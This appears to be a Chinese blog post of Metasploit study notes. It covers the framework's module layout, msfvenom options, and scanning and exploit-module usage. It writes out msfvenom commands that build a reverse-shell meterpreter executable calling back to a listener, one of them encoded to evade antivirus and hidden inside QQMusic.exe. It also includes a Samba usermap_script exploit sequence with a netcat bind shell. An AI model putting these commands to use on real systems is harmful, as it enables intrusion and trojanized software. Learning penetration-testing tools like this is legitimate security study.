Metasploit学习

已于 2024-01-13 17:32:11 修改
阅读量352 收藏 5
点赞数 8
分类专栏: Metasploit 文章标签: 学习
于 2023-12-28 22:57:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53479835/article/details/135274745
版权

前言

Metasploit是一款开源的安全漏洞检测工具,包含辅助、漏洞利用、编码、攻击载荷等模块。Metasploit本身附带数百个已知软件漏洞的专业级漏洞攻击工具,能快速获取、开发并对计算机软件漏洞实施攻击。

目录结构

metasploit在linux下的目录位置:

usr/share/metasploit-framework

modules是存放模块的目录

auxiliary(辅助模块):辅助渗透测试,扫描端口、爆破密码、嗅探、指纹识别

exploits(漏洞利用模块):包含漏洞利用脚本,对目标进行漏洞利用

payloads(攻击载荷):攻击成功后在目标机器执行的代码

encoders(编码模块):对payload进行编码以绕过入侵检测

post(后渗透模块):成功获取meterpreter后对目标发送指令

evasion(躲避模块):生成免杀payload

plugins是存放插件的目录

tools存放其它工具

config存放配置文件和执行文件

scripts存放辅助的脚本

db存放数据库文件

data存放数据文件,例如字典

Msfvenom

Kali中Msfvenom代替msfpayload和msfencode

常用参数:

        -l (列出指定模块可用的资源)

payloads/encoders/nops/all

        -p(指定payload)

        -f(指定输出的文件格式)

        -o(payload文件输出)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhos192.168.108.236 lport=9999 -f exe -o test1.exe

        -e(指定编码器)

        -a(指定payload的目标架构平台)

       

        -b(设定规避字符集)

        -n(为payload预先指定一个NOP长度)

        -s(指定payload长度)

        -i(指定编码次数)

        -c(指定一个附加的win32 shellcode文件)

        -x(指定一个自定义的可执行文件并嵌入payload)

        -k(保护模板程序的动作,注入的payload作为一个新的进程运行)

        -v(指定自定义变量)

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhos192.168.108.236 lport=9999 -e x86/shikata_ga_nai -b '\x00\xff'-i 10 -x QQMusic.exe -f exe -o new1.exe

auxuliary模块

扫描存活主机

use auxiliary/scanner/discovery/arp_sweep

端口扫描

use auxiliary/scanner/portscan/syn

查看需要配置的选项

show options

 设置需要配置的参数

set rhost 192.169.22.33

搜索模块

search platform:windows cve:2009 type:exploit

 exploit模块

使用渗透攻击模块

use exploit/multi/samba/usermap_script

查看与该渗透攻击模块相兼容的攻击载荷

show payloads

设置攻击载荷

set payload cmd/unix/bind_netcat

查看需要配置参数

options

设置需要配置的参数

set rhost 192.169.22.33

开始攻击

run

烟波江上 T
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit学习总结
马赛克的博客
04-04 601
一:前言 Metasploit是一个漏洞利用框架,我们可以获取,使用,开发,共享漏洞攻击程序,(可以根据自己的需要开发漏洞攻击程序)。 并且提供了大量的攻击载荷供我们选择,所谓的攻击载荷就是再目标计算机上实现"额外的功能",就像是回答的问题:“我已经控制了机器,还要做什么”,一般来说,最受欢迎的攻击载荷包括添加用户,开启后门,以及在目标机安装新软件。 二:使用 原则:把Metasploit...
Metasploit学习笔记
weixin_44854561的博客
10-27 324
个人学习——Metasploit学习笔记1 认识metasploit #Meatsploit渗透测试指南学习笔记# 学习目标:认识Metasploit工具 学习内容: 1、 初识渗透测试技术 2、 初始metasploit 3、 学习metasploit基础 1.初识渗透测试 渗透测试(Penetration Testing)是一种通过模拟攻击者的技术与方法,挫败目标系统的安全控制措施并且取得访问控制权的安全测试方式。 PTES将渗透测试过程分为七个阶段: 1.1 前期交互阶段 该阶段通常由渗透测试人
Metasploit学习笔记-01
m0_55782205的博客
03-20 118
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
Kali之metasploit学习
weixin_42515203的博客
06-12 433
Kali之metasploit学习
metasploit学习
m0_51418771的博客
12-22 591
杀毒软件和防火墙直接就给删掉了,我们只好很固执的告诉勤奋的防火前:我相信它,他不是病毒!攻击还是要考虑目标机的实际情况。我测试了我的虚拟机win10,而后测试了全家的手机,都没攻进去,大概是10版本太高。该漏洞是微软445端口的问题,SMB,被微软命名为2017的第十号漏洞。默认为HOME / [随机乱码名字] .wav。window:操作系统的版本,macos,linux等。-p :自动播放捕获的音频,默认为“true”-d :记录的秒数,默认为1秒。Set 必选项:RHOSTS。没有视频,可以录音哦。
metasploit学习笔记
cc777777777的博客
05-06 128
metasploit操作
Metasploit学习第一章:文件结构
qq_51515209的博客
11-28 564
metasploit学习
Metasploit学习笔记(一)——简单使用
Zichel77的博客
10-05 773
Metasploit中可以使用Nmap进行扫描,用于判断主机的存货状态,也可以扫描主机的操作系统版本,开放的端口和服务状态等。这一步可要可不要,我是做到后面需要nmap扫描的时候需要root权限,所以我第一步就把它打开好了。输入use然后接上模块的名称,对该漏洞利用模块进行利用。这里使用的目标主机是Windows XP,IP地址为。可以看到nmap的版本信息,还有操作符的解释等等。可以看出135,139和445三个端口开放。可以看到搜索出来的模块就是带有该关键字的。此处举例仅介绍目标主机的OS类型。
Metasploit学习-1
seeicb的博客
03-06 462
title: Metasploit学习-1 date: 2018-03-14 21:17:37 categories: 安全 tags: [Metasploit,工具] Metasploit 介绍 Metasploit是一个漏洞利用框架,全称The Metasploit Framework,简称MSF。 msf包括各种模块,插件,和第三方工具。如msfvenom,db_nmap,db_sqlm...
Metasploit 学习 指南— 基础篇
12-23
Metasploit 是一款强大的渗透测试平台,其中包括了很多渗透测试利器,本文简单介绍一下 Metasploit 的配置和基础的使用方法,主要包括以下几个方面: 网上朋友总结的,在此谢过!讲述kali linux
Metasploit 学习指南
08-26
### Metasploit 学习指南 #### 一、概述与基础知识 Metasploit是一款功能强大的渗透测试框架,被广泛应用于安全审计、漏洞评估以及红队行动中。它可以帮助安全专家发现系统中的潜在威胁,并通过模拟攻击来验证这些...
Metasploit学习必看教程.zip
12-27
Metasploit学习必看教程》是一份专为网络安全爱好者和专业人士准备的详细教程,它深入浅出地讲解了如何运用Metasploit框架进行网络攻防。Metasploit是一款广泛使用的开源安全工具,主要用于安全测试、漏洞验证以及...
Metasploit学习资料.zip
02-06
**Metasploit学习资料概述** Metasploit是一款广泛使用的开源安全工具,主要用于渗透测试和漏洞评估。这个压缩包“Metasploit学习资料.zip”包含了多个关于Metasploit框架的资源,帮助用户深入理解和掌握这款强大的...
12306项目学习笔记(框架篇Base)
qq_74851649的博客
08-30 473
首先学习的是基础框架提供了一种静态方式来访问Spring容器中的Bean,适用于某些特定场景,如工具类和框架集成。在12306项目中由于我们引入了RocketMQ消息队列,这些库的对象通常不是Spring管理的,无法直接使用@Autowired注入,所以需要类提供一种静态方式来访问Spring容器中的Bean。比如在我们的TicketServiceImpl中的bean对象就是用以下方法获取的。
软件测试学习笔记丨Pytest配置文件
ceshiren_com的博客
08-27 2610
pytest.ini是pytest的配置文件;可以修改pytest的默认行为;不能使用任何中文符号,包括汉字、空格、引号、冒号等。
Web3开发与安全:6个月高效学习路径
weixin_47075747的博客
08-30 593
这份计划应该能帮助你系统地学习智能合约开发和安全审计技能,同时克服英语的障碍。
AI实践与学习8-AI Agent Workflow助力解题和验证答案置信度
最新发布
xiaosi的博客
08-30 340
之前在试着提高解题正确率,目标100%,发现外部知识不足仅依靠大模型的话比较困难。而试题人工生产成本巨大。本质因为大模型生成内容会有幻觉特点,也就是说解答的试题正确性不太好评判,直接解答试题生产场景不太可控。后面考虑调用OpenAI解题的时候,像xxx那样通过输出置信度来帮助判断答案的正确性 or 其他形式只要能保证LLM生成答案是可靠(程序判断)的。
如何学习自动化测试工具!
qq_43371695的博客
08-28 809
学习和掌握自动化测试工具的使用方法,可以按照以下步骤进行:一、明确学习目标 首先,需要明确你想要学习哪种自动化测试工具。自动化测试工具种类繁多,包括但不限于Selenium、Appium、JMeter、Postman、Robot Framework等,每种工具都有其特定的使用场景和优势。因此,在选择学习工具时,应结合自己的实际需求和学习目标进行选择。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值